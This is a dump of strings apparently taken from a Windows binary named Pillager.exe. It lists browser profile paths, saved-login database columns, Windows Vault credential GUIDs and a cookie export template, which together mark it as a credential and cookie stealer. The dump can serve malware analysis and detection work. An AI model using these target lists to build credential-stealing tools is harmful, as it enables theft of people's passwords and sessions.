storage-sync-v2.sqlite
storage-sync-v2.sqlite-shm
storage-sync-v2.sqlite-wal
FireFox
Mozilla\Firefox\Profiles
Don't support recovery IE password from wow64 process
[ERROR] Unable to enumerate vaults. Error (0x
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
Unable to open the following vault:
. Error: 0x
[ERROR] Unable to enumerate vault items from the following vault:
. Error 0x
SchemaId
pResourceElement
pIdentityElement
LastModified
pPackageSid
Error occured while retrieving vault item. Error: 0x
pAuthenticatorElement
Vault Type : {
LastModified : {
Software\Microsoft\Internet Explorer\TypedURLs
URL=(.*?)\n
Cookies
encrypted_value
HistoryUrl3.db
UserRankUrl
FormData3.dat
favorite3.dat
Local Storage
OldSogouExplorer
SogouExplorer\Webkit\Default
\Login Data
logins
origin_url
username_value
password_value
\History
\360History
\Cookies
\Network\Cookies
expires_utc
"domain": "
"expirationDate":
"hostOnly": false,
"name": "
"path": "
"session": true,
"storeId": null,
"value": "
\Bookmarks
\360Bookmarks
\Extensions
manifest.json
"name": "(.*?)"
Default
Profile
_extension.txt
\Local Storage
\Local Extension Settings
\Sync Extension Settings
Chrome
Google\Chrome\User Data
Chrome Beta
Google\Chrome Beta\User Data
Chromium
Chromium\User Data
Chrome SxS
Google\Chrome SxS\User Data
Microsoft\Edge\User Data
Brave-Browser
BraveSoftware\Brave-Browser\User Data
QQBrowser
Tencent\QQBrowser\User Data
SogouExplorer
Sogou\SogouExplorer\User Data
360ChromeX
360ChromeX\Chrome\User Data
360Chrome
360Chrome\Chrome\User Data
Vivaldi
Vivaldi\User Data
CocCoc
CocCoc\Browser\User Data
Torch\User Data
Kometa
Kometa\User Data
Orbitum
Orbitum\User Data
CentBrowser
CentBrowser\User Data
7Star\7Star\User Data
Sputnik
Sputnik\Sputnik\User Data
Epic Privacy Browser
Epic Privacy Browser\User Data
uCozMedia\Uran\User Data
Yandex
Yandex\YandexBrowser\User Data
Iridium
Iridium\User Data
Opera Software\Opera Stable
Opera GX
Opera Software\Opera GX Stable
Unable to find the section in the dictionary list:
default
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Pillager
FileVersion
1.0.0.0
InternalName
Pillager.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
Pillager.exe
ProductName
Pillager
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0